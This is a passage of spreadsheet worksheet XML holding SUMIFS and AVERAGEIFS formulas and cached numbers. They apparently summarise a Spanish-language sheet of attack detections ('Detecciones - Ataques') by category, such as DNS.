        <f>DC31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DD35" s="355">
        <f>DD31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="DE35" s="355">
        <f>DE31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>5</v>
      </c>
      <c r="DF35" s="355">
        <f>DF31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="DG35" s="355">
        <f>DG31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DH35" s="355">
        <f>DH31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>450</v>
      </c>
      <c r="DI35" s="355">
        <f>DI31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DJ35" s="356">
        <f>DJ31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>11</v>
      </c>
      <c r="DK35" s="271"/>
      <c r="DO35" s="357"/>
      <c r="DP35" s="358" t="s">
        <v>1373</v>
      </c>
      <c r="DQ35" s="359">
        <v>1.0</v>
      </c>
      <c r="DR35" s="359">
        <v>3.0</v>
      </c>
      <c r="DS35" s="359">
        <v>3.0</v>
      </c>
      <c r="DT35" s="359">
        <v>3.0</v>
      </c>
      <c r="DU35" s="360">
        <v>3.0</v>
      </c>
      <c r="DV35" s="271"/>
      <c r="DW35" s="358" t="s">
        <v>1373</v>
      </c>
      <c r="DX35" s="359">
        <v>2.0</v>
      </c>
      <c r="DY35" s="359">
        <v>4.0</v>
      </c>
      <c r="DZ35" s="359">
        <v>7.0</v>
      </c>
      <c r="EA35" s="359">
        <v>7.0</v>
      </c>
      <c r="EB35" s="360">
        <v>18.0</v>
      </c>
      <c r="EC35" s="271"/>
      <c r="ED35" s="280"/>
      <c r="EG35" s="279"/>
      <c r="EH35" s="271"/>
      <c r="EI35" s="358" t="s">
        <v>1373</v>
      </c>
      <c r="EJ35" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI35,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S33 &amp; "*")</f>
        <v>9</v>
      </c>
      <c r="EK35" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BX$3:$BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI35,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!BX$3:BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI35 &amp; "*")</f>
        <v>20</v>
      </c>
      <c r="EL35" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI35,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI35 &amp; "*")</f>
        <v>27</v>
      </c>
      <c r="EM35" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI35,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI35 &amp; "*")</f>
        <v>89</v>
      </c>
      <c r="EN35" s="360">
        <f t="shared" si="4"/>
        <v>89</v>
      </c>
      <c r="EO35" s="364"/>
      <c r="EP35" s="364"/>
      <c r="EQ35" s="364"/>
      <c r="ER35" s="271"/>
      <c r="ES35" s="271"/>
      <c r="ET35" s="271"/>
      <c r="EU35" s="271"/>
      <c r="EV35" s="379" t="s">
        <v>1373</v>
      </c>
      <c r="EW35" s="389">
        <f t="shared" si="8"/>
        <v>0.5</v>
      </c>
      <c r="EX35" s="389">
        <f t="shared" si="9"/>
        <v>1.111111111</v>
      </c>
      <c r="EY35" s="389">
        <f t="shared" si="10"/>
        <v>1.5</v>
      </c>
      <c r="EZ35" s="390">
        <f t="shared" si="11"/>
        <v>4.944444444</v>
      </c>
      <c r="FA35" s="367"/>
      <c r="FC35" s="334" t="s">
        <v>2462</v>
      </c>
      <c r="FD35" s="335" t="s">
        <v>2478</v>
      </c>
      <c r="FE35" s="368">
        <f t="shared" ref="FE35:FH35" si="17">EJ66</f>
        <v>0.847826087</v>
      </c>
      <c r="FF35" s="368">
        <f t="shared" si="17"/>
        <v>0.652173913</v>
      </c>
      <c r="FG35" s="368">
        <f t="shared" si="17"/>
        <v>0.6689189189</v>
      </c>
      <c r="FH35" s="369">
        <f t="shared" si="17"/>
        <v>0.8167938931</v>
      </c>
      <c r="FK35" s="303" t="s">
        <v>664</v>
      </c>
      <c r="FL35" s="68">
        <f t="shared" si="18"/>
        <v>5</v>
      </c>
      <c r="FM35" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK35,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK35 &amp; "*")</f>
        <v>20</v>
      </c>
      <c r="FN35" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK35,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK35 &amp; "*")</f>
        <v>30</v>
      </c>
      <c r="FO35" s="304">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK35,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK35 &amp; "*")</f>
        <v>45</v>
      </c>
      <c r="FQ35" s="303" t="s">
        <v>664</v>
      </c>
      <c r="FR35" s="69">
        <f t="shared" ref="FR35:FU35" si="19">1-(FL35/EJ37)</f>
        <v>0</v>
      </c>
      <c r="FS35" s="69">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="FT35" s="69">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="FU35" s="306">
        <f t="shared" si="19"/>
        <v>0.3076923077</v>
      </c>
      <c r="FV35" s="392"/>
      <c r="FW35" s="392"/>
      <c r="FX35" s="392"/>
      <c r="FY35" s="392"/>
      <c r="FZ35" s="392"/>
      <c r="GA35" s="392"/>
      <c r="GB35" s="392"/>
      <c r="GC35" s="392"/>
      <c r="GD35" s="392"/>
      <c r="GE35" s="392"/>
      <c r="GF35" s="392"/>
      <c r="GG35" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"DNS")</f>
        <v>DNS</v>
      </c>
      <c r="GH35" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG35)</f>
        <v>0.7503866228</v>
      </c>
      <c r="GI35" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG35)</f>
        <v>0.7503865481</v>
      </c>
      <c r="GJ35" s="373">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG35)</f>
        <v>1</v>
      </c>
      <c r="GK35" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"DNS")</f>
        <v>DNS</v>
      </c>
      <c r="GL35" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG35)</f>
        <v>0.75</v>
      </c>
      <c r="GM35" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG35)</f>
        <v>0.75</v>
      </c>
      <c r="GN35" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG35)</f>
        <v>0.75</v>
      </c>
      <c r="GO35" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"DNS")</f>
        <v>DNS</v>
      </c>
      <c r="GP35" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG35)</f>
        <v>0.25</v>
      </c>
      <c r="GQ35" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG35)</f>
        <v>0.25</v>
      </c>
      <c r="GR35" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG35)</f>
        <v>0.25</v>
      </c>
      <c r="GS35" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"DNS")</f>
        <v>DNS</v>
      </c>
      <c r="GT35" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG35)</f>
        <v>0.25</v>
      </c>
      <c r="GU35" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG35)</f>
        <v>0.25</v>
      </c>
      <c r="GV35" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG35)</f>
        <v>0.25</v>
      </c>
      <c r="GW35" s="392"/>
      <c r="GX35" s="392"/>
      <c r="GY35" s="392"/>
      <c r="GZ35" s="392"/>
      <c r="HA35" s="392"/>
      <c r="HB35" s="392"/>
      <c r="HC35" s="392"/>
      <c r="HD35" s="392"/>
      <c r="HE35" s="392"/>
      <c r="HF35" s="392"/>
      <c r="HG35" s="392"/>
      <c r="HH35" s="392"/>
      <c r="HI35" s="392"/>
      <c r="HJ35" s="392"/>
      <c r="HK35" s="392"/>
      <c r="HL35" s="392"/>
      <c r="HM35" s="392"/>
      <c r="HN35" s="392"/>
      <c r="HO35" s="392"/>
      <c r="HP35" s="392"/>
    </row>
    <row r="36">
      <c r="B36" s="277"/>
      <c r="C36" s="271"/>
      <c r="D36" s="271"/>
      <c r="E36" s="271"/>
      <c r="F36" s="271"/>
      <c r="G36" s="278"/>
      <c r="J36" s="277"/>
      <c r="K36" s="386" t="s">
        <v>2479</v>
      </c>
      <c r="L36" s="387" t="s">
        <v>2480</v>
      </c>
      <c r="M36" s="387" t="s">
        <v>2481</v>
      </c>
      <c r="N36" s="388" t="s">
        <v>2482</v>
      </c>
      <c r="O36" s="278"/>
      <c r="Q36" s="271"/>
      <c r="R36" s="386" t="s">
        <v>2479</v>
      </c>
      <c r="S36" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>4</v>
      </c>
      <c r="T36" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="U36" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>6</v>
      </c>
      <c r="V36" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>2</v>
      </c>
      <c r="W36" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X36" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="Y36" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="Z36" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>1356</v>
      </c>
      <c r="AA36" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>2</v>
      </c>
      <c r="AB36" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>8</v>
      </c>
      <c r="AC36" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>18</v>
      </c>
      <c r="AD36" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>17</v>
      </c>
      <c r="AE36" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>5</v>
      </c>
      <c r="AF36" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>18</v>
      </c>
      <c r="AG36" s="271"/>
      <c r="AH36" s="386" t="s">
        <v>2479</v>
      </c>
      <c r="AI36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>4</v>
      </c>
      <c r="AJ36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>0</v>
      </c>
      <c r="AK36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>0</v>
      </c>
      <c r="AL36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>0</v>
      </c>
      <c r="AN36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>1</v>
      </c>
      <c r="AR36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>1</v>
      </c>
      <c r="AS36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>1</v>
      </c>
      <c r="AU36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>1</v>
      </c>
      <c r="AV36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>2</v>
      </c>
      <c r="AW36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>2</v>
      </c>
      <c r="AY36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>0</v>
      </c>
      <c r="BA36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>1</v>
      </c>
      <c r="BD36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>0</v>
      </c>
      <c r="BF36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>1</v>
      </c>
      <c r="BI36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>0</v>
      </c>
      <c r="BL36" s="355">
